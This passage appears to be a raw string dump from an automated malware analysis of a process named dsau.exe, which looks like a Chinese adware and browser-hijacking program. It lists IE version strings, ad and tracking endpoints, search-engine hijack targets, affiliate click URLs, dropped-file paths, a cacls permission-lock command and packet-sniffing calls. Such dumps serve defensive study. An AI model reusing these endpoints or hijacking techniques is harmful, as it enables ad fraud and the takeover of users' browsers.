(xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 (srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 (srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 (srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 (srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 (srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 (srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>http://</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://cnrdn.com/</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>x%X@0</pre><pre>`.bss</pre><pre>.rdata</pre><pre>.reloc</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><pre>WINDOWS</pre><pre>url=http://pop.4278.cn/mpop/index2.html</pre><pre>url=http://pop.4278.cn/qpop/</pre><pre>url=http://pop.4278.cn/apop/bootcount.html</pre><pre>url=http://pop.4278.cn/mpop/index.html</pre><pre>iexplore.exe|tango3.exe|360se.exe</pre><pre>qq.exe|Thunder.exe|QvodPlayer.exe|Storm.exe|XMP.exe</pre><pre>MiniIE.exe</pre><pre>%Program Files%\MiniIE.exe</pre><pre>%Program Files%\tango3\tango3.exe</pre><pre>http\shell\open\command</pre><pre>iexplore.exe</pre><pre>tango3.exe</pre><pre>CmdLine:%s</pre><pre>New ProcessId:%d</pre><pre>-url:%s -win:3 -delay:%d -id:%d</pre><pre>-url:%s -ref:%s -js:%s -win:8 -delay:%d -id:%d</pre><pre>X d d %s</pre><pre>:d</pre><pre>(d-d)</pre><pre>(d-d)</pre><pre>OnEvent win:%d url:%s</pre><pre>dwPid:X</pre><pre>szAdwinExeName:%s</pre><pre>gszAdWinPath:%s</pre><pre>AdWin:%s</pre><pre>12222221</pre><pre>\~DFA5846.TMP</pre><pre>User POP ID:%s</pre><pre>%Program Files%\Common Files\MvuijhKz.exe</pre><pre>szCommandLine:%s</pre><pre>UserName:%s</pre><pre>http://tt.woai310.com/client/config.ini</pre><pre>id:%u url %s</pre><pre>MT cid:d id:d win:d rang(d-d) %s</pre><pre>name %s %s</pre><pre>explorer.exe</pre><pre>, ini->ngroup=%d</pre><pre>StatusCode:%d</pre><pre>cache.bin</pre><pre>szCookieFile:%s</pre><pre>add_cache_entry:%s</pre><pre>%d %s</pre><pre>clear_cache_entry:%s</pre><pre>bDel=%d</pre><pre>user:%s</pre><pre>AppPath:%s</pre><pre>ParentPath:%s</pre><pre>RandName:%s</pre><pre>Create Rand Temp Path: %s</pre><pre>:%d: %s</pre><pre>0xX,</pre><pre>NtCreateProcessEx ProcessHandle:X ParentProcess:X</pre><pre>NtCreateProcessEx dwParentPid:%d</pre><pre>NtCreateProcessEx hPrcess:X</pre><pre>lpITA:X</pre><pre>bytes=%d-</pre><pre>bytes=%d-%d</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ip dest port unreachable</pre><pre>unknown msg returned</pre><pre>localhost:%d.%d.%d.%d</pre><pre>%-8s: %d</pre><pre>%-8s: %d.%d.%d.%d</pre><pre>%-8s: X-X-X-X-X-X</pre><pre>xxxxxx</pre><pre>index:%d mac_str:%s</pre><pre>ATL:X</pre><pre>WM_COPYDATA, Len:%d</pre><pre>PPROCESS_MSG</pre><pre>COOKIES:%s</pre><pre>recv_len=%d, end size:%d</pre><pre>recv_len=%d</pre><pre>HttpSendRequest:</pre><pre>URI:%s</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>application/x-www-form-urlencoded</pre><pre>POST ok, ret=%d</pre><pre>cont_len:%d</pre><pre>header end ret:%d</pre><pre>LoopEnd ok retcode=%d</pre><pre>detail.tmall.com</pre><pre>http://s.click.taobao.com/t_js?tu=</pre><pre>(%d/%d),</pre><pre>CreateIpNetEntry() ret:%d</pre><pre>%s|%d|%s|%d|%d|%d|%s|%d</pre><pre>http://log.soomeng.com/sslog?</pre><pre>list.length=%d</pre><pre>szTime:%s</pre><pre>tmp:%s</pre><pre>http://tt.woai310.com/?do=post&u=%s&m=%s&c=%d&s=%d&r=%s&v=%s&p=%s</pre><pre>GetExtendedTcpTable</pre><pre>GetExtendedUdpTable</pre><pre>TCP Statistics for IPv4</pre><pre>Passive Opens</pre><pre>UDP Statistics for IPv4</pre><pre>No Ports</pre><pre>NTDLL.dll</pre><pre>%SystemRoot%\System32\ntoskrnl.exe</pre><pre>%s ModuleHandle:X</pre><pre>pNtHeader:X</pre><pre>image_size:%d</pre><pre>image_base:X</pre><pre>pDllMain:X</pre><pre>InitResult:%d</pre><pre>p_imp_lib_name:%s Ordinal:%d</pre><pre>OriginalFirstThunk:X FirstThunk:X</pre><pre>GetProcAddress SetFlags OK Addr:X</pre><pre>GetProcAddress PackTheFile OK Addr:X</pre><pre>bIsVM:%d</pre><pre>m_nTmCount:%d</pre><pre>RegFlag count:%d cmp:%d</pre><pre>UpdateRegList nShow:%d nReg:%d</pre><pre>RunSubmitThread nShow:%d nReg:%d</pre><pre>IsWindow:%d IsWindowVisible:%d</pre><pre>%d %d %d %d</pre><pre>New Msg:%d</pre><pre>Msg:%d id:%u Url:%s</pre><pre>http://www.sogou.com/index</pre><pre>http://www.baidu.com/index</pre><pre>http://www.soso.com/wbhp</pre><pre>http://www.soso.com/sp.shtml</pre><pre>http://www.google.com.hk/webhp</pre><pre>http://123.sogou.com/?</pre><pre>http://123.sogou.com/nh/?</pre><pre>http://www.tao123.com/?</pre><pre>http://www.wbindex.cn/sgnav/</pre><pre>http://www.wbindex.cn/ww/</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.baidu.com/baidu</pre><pre>http://www.baidu.com/s</pre><pre>http://www.soso.com/q</pre><pre>http://www.google.com.hk/search</pre><pre>TangoWeb</pre><pre>360chrome</pre><pre>firefox</pre><pre>twchrome</pre><pre>chrome</pre><pre>opera</pre><pre>Opera</pre><pre>HTTP GET</pre><pre>HostName:%s</pre><pre>LocalIP:%s</pre><pre>setsockopt(SOL_SOCKET,SO_RCVBUF,TRUE) nRet:%d</pre><pre>setsockopt(SOL_SOCKET,SO_REUSEADDR,TRUE) nRet:%d</pre><pre>setsockopt(IPPROTO_IP,IP_HDRINCL,TRUE) nRet:%d</pre><pre>WSAIoctl(SIO_RCVALL) nRet:%d</pre><pre>get_home_url_param:%d</pre><pre>m_lock_page_pid:%s</pre><pre>.wbindex.cn</pre><pre>PID: %-5d %s exe_id:%d page_type:%d page_id:%d pid:%s</pre><pre>Name1:%s</pre><pre>zcÁ</pre><pre>Lkcjzquw.exe</pre><pre>%Program Files%\Common Files\mdhc\cache.bin</pre><pre>%Program Files%\Common Files\mdhc\</pre><pre>sau.exe</pre><pre>%Program Files%\Common Files\</pre><pre>%Program Files%\Common Files\Lkcjzquw.exe</pre><pre>%Program Files%\Common Files\mdhc\dsau.exe</pre><pre>?456789:;<=</pre><pre>!" /><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>tv_w32.dll</pre><pre>indicdll.dll</pre><pre>mshtml.dll</pre><pre>shell32.dll</pre><pre>msctfime.ime</pre><pre>msctf.dll</pre><pre>uxtheme.dll</pre><pre>Microsoft(R) Windows(R) Operating System</pre><pre>6, 0, 2900, 5512</pre><pre>6.00.2900.5512</pre><b>dsau.exe_3672_rwx_00960000_00009000:</b><pre>.text</pre><pre>`.bss</pre><pre>.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.dll</pre><pre>.rsrc</pre><pre>.data</pre><pre>kernel32.dll</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>12222221</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><b>dsau.exe_3672_rwx_00CA0000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe "%s" /e /d everyone</pre><pre>%Program Files%\E-yoo\EyooSechelper2.dll</pre><pre>http://</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>Software\Microsoft\Windows\ShellNoRoam\TempCache</pre><pre>Software\Microsoft\Windows\ShellNoRoam\ShellCache</pre><pre>herollq.exe</pre><pre>WebPlayer2010.exe</pre><pre>VODPlayer.exe</pre><pre>JSKPBrowser.exe</pre><pre>ValeBrowser.exe</pre><pre>wmconfig.exe</pre><pre>NewBho.DLL</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>ws2_32.dll</pre><pre>ole32.dll</pre><pre>ieui.dll</pre><pre>mshtml.dll</pre><pre>IEFrame.dll</pre><pre>iertutil.dll</pre><pre>User32.dll</pre><pre>SHLWAPI.dll</pre><pre>wininet.dll</pre><pre>urlmon.dll</pre><pre>mswsock.dll</pre><pre>ws2help.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>NtQueryValueKey</pre><pre>NtOpenKey</pre><pre>ADVAPI32.dll</pre><pre>ntdll.dll</pre><pre>Kernel32.dll</pre><pre>dnsapi.dll</pre><pre>msvcrt</pre><pre>PubwinClient.exe</pre><pre>RunMe.exe</pre><pre>{11F09AFE-75AD-4E52-AB43-E09E9351CE17}</pre><pre>Shell.User\Group</pre><pre>oleaut32.dll</pre><pre>browseti.dll</pre><pre>hinthk.dll</pre><pre>zclm8.com</pre><pre>wq581.com</pre><pre>maimeng8.com</pre><pre>5sla.com</pre><pre>wb360.net</pre><pre>renren.com</pre><pre>jj123.com.cn</pre><pre>wb12318.com</pre><pre>iwb110.com</pre><pre>woai310.com</pre><pre>http://123.sogou.com</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.sogou.com/index</pre><pre>.info</pre><pre>http://baidu.com</pre><pre>{X-X-x-XX-XXXXXX}</pre><pre>www.soso.com</pre><pre>www.google.com</pre><pre>www.hao123.com</pre><pre>www.tao123.com</pre><pre>www.baidu.com</pre><pre>123.sogou.com</pre><pre>www.sogou.com</pre><pre>www.iwb110.com</pre><pre>rpcrt4.dll</pre><pre>kernel32.dll</pre><pre>{xxxx-xx-xx-xx-xxxxxx}</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>xxxxxx</pre><pre>http://www.baidu.com/adrc.php?</pre><pre>http://www.baidu.com/baidu.php?</pre><pre>http://www.baidu.com/s?</pre><pre>http://www.hao123.com/?</pre><pre>http://123.sogou.com/?</pre><pre>http://www.sogou.com/img/fav.ico?</pre><pre>http://pv.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/cl.gif?</pre><pre>http://www.google.com/aclk?</pre><pre>http://www.sogou.com/bill_</pre><pre>http://www.sogou.com/sogou?</pre><pre>http://test.hermes.sogou.com/sa.gif?</pre><pre>http://www.sogou.com/index.htm</pre><pre>118.145.16.80</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>shdocvw.dll</pre><pre>ieframe.dll</pre><pre>http://www.sogou.com/sogou?query=</pre><pre>sogou-netb-xx-d</pre><pre>%%X</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeaders</pre><pre>\StringFileInfo\xx\%s</pre><pre>user32.dll</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 (xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 (xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 